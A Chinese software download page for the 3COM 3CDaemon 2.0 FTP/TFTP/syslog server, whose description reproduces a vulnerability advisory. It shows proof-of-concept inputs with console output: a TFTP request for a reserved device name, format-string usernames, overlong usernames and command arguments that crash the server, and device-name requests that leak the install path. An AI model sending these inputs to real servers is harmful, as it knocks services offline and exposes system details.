专业下载站,下载软件就到188下载站

188软件园

首页 最新更新 下载排行 软件分类 游戏大全 资讯教程 专题合集
您的位置: 188软件园>网络软件>FTP 工具  > 

3COM 3CDaemon 2.0

  • 软件大小:0.24MB
  • 更新日期:16-04-01
  • 软件语言:中文
  • 软件类别:FTP 工具
  • 软件授权:免费软件
  • 适用平台:WinXP, WinAll
  • 安全检测: 360安全卫士 360杀毒 电脑管家
安全下载 使用WindSoul软件管家下载

下载3COM 3CDaemon 2.0的还下载了

卿卿日常:尹峥李薇闭府居家打牌
喜剧大赛2:吸血鬼天撞上东北波er
我们的歌4:合唱如果没有你
想看更多,点一下吧
爱奇艺下载
相似软件下载

下载服务协议见页面底部

软件介绍 人气软件 网友评论 下载地址

为您推荐: 网易邮箱大师 图图去水印 果备份 CC加速器 芒果TV

不用我说了吧,3com的这款东西还是很有名很不错滴~~~3CDaemon是一款免费的集成了TFTP、FTP和SYSLOG功能的应用程序。
作用:FTP,TFTP,SYSLOG服务器,TFTP客户端

3CDaemon存在多个安全问题,远程攻击者可以利用这些漏洞进行拒绝服务、格式串及缓冲区溢出等攻击。

1、TFTP保留设备名拒绝服务攻击:

提交类似如下的请求,可导致TFTP服务程序挂起:

D:\WINDOWS\system32>tftp -i 192.168.0.1 get prn
The 3CDaemon will be crashed with some msgs like
"Microsoft Visual C++ Runtime library"
"Runtime Error!"
"Program : C:\Program Files\3Com\3CDaemon\3CDaemon.exe "
"abnormal program termination".

2、FTP用户名存在格式串问题:

提交包含格式串字符作为用户名数据,可导致守护程序崩溃:

H:\>ftp 192.168.0.1
Connected to 192.168.0.1.
220 3Com 3CDaemon FTP Server Version 2.0
User (192.168.0.1:(none)): %n
Connection closed by remote host.

OR:
H:\>ftp 192.168.0.1
Connected to 192.168.0.1.
220 3Com 3CDaemon FTP Server Version 2.0
User (192.168.0.1:(none)): %s
331 User name ok, need password
Password:[anythinghere]
530 Login access denied
Login failed.
ftp>

3、FTP超长用户名缓冲区溢出

由于对用户名缺少正确边界缓冲区检查,提交超长用户名可导致缓冲区溢出:

D:\WINDOWS\system32>ftp 192.168.0.1
Connected to 192.168.0.1.
220 3Com 3CDaemon FTP Server Version 2.0
User (192.168.0.1:(none)):
501 Invalid or missing parameters
Login failed.
ftp> user AAA..[about 241 A here]...AAAAA
Connection closed by remote host.

4、多个FTP命令超长参数缓冲区溢出:

cd,send,ls,,put,delete,rename,rmdir,literal,stat,CWD等FTP命令对参数缺少充分边界检查,提交超长字符串作为命令参数可导致缓冲区溢出:

ftp> cd AAA..[about 398 A here]...AAAAA
Connection closed by remote host.
ftp>

ftp> ls AAA..[about 247 A here]...AAAAA
200 PORT command successful.
Connection closed by remote host.

ftp> put 1.txt AAA..[about 247 A here]...AAAAA
200 PORT command successful.
532 Need account for storing files
Connection closed by remote host.

5、多个FTP命令存在格式串问题

提交格式字符串作为参数,可导致程序崩溃。

6、多个FTP命令包设备名信息泄露问题

请求保留设备名可导致返回程序安装路径信息:

ftp> cd aux
550 aux : C:/3cdaemon/aux is not a directory!
ftp> cd lpt1
550 lpt1 : C:/3cdaemon/lpt1 is not a directory!


受影响系统:
3Com 3CDaemon 2.0 revision 10

下载地址

安全下载地址

优先使用Windsoul软件管家下载,更安全高效
电信安全下载 联通安全下载 移动安全下载 网通安全下载 长城安全下载 铁通安全下载

普通下载地址

通用网络下载 通用网络下载

相关文章

网友评论

您的评论需要经过审核才能显示 网名

0条评论>网友评论

装机必备

Foxmail

Foxmail
微信

微信
WPS Office

WPS Office
360安全卫士

360安全卫士
百度网盘

百度网盘
爱奇艺视频

爱奇艺视频
QQ游戏大厅

QQ游戏大厅
搜狗输入法

搜狗输入法
雷神加速器

雷神加速器
百度文库

百度文库
抖音PC版

抖音PC版
向日葵远程控制

向日葵远程控制

相关分类

小编强力推荐

  • 下载

    CC加速器v3.1 43.66MB / 24-03-28

  • 下载

    QQ游戏大厅5.54.58036官方版 57.9MB / 24-03-06

  • 下载

    红手指云手机2.2.51 20.4MB / 23-11-22

  • 下载

    驱动人生8.16.19.56 65 MB / 23-11-22

下载周排行

  • 1 360浏览器13.1.1469.0 最新版

    53.4MB /下载

  • 2 租号玩5.17.230816.2 官方版

    3.03MB /下载

  • 3 万能数据恢复大师7.0.1.1 最新版

    3.28MB /下载

  • 4 向日葵远程控制 13.2.0.55335

    29MB /下载

  • 5 360安全卫士13.0 最新版

    86.1MB /下载

  • 6 腾讯视频V11.80.3227.0 官方正式版

    87.5 MB /下载

  • 7 腾讯QQ9.6.9.28878 最新版

    201.87MB /下载

  • 8 嗨格式录音大师1.0.33.97 官方版

    28.7MB /下载





3COM 3CDaemon 2.0

3COM 3CDaemon 2.0

立即下载 安全下载 使用WindSoul软件管家下载

188软件园为您提供:软件下载游戏下载资讯教程专题下载等欢迎下载

商务合作邮箱:ad@cumulon.com 软件发布 版权声明 Cookie政策 下载服务协议&个人信息保护政策

公安部网络违法犯罪举报网站

Copyright © 2012-2020 南京若白网络科技有限公司 版权所有 All Rights Reserved. 苏ICP备2023013970号-7

增值电信业务经营许可证:苏B2-20200513

苏公网安备 32011202000452号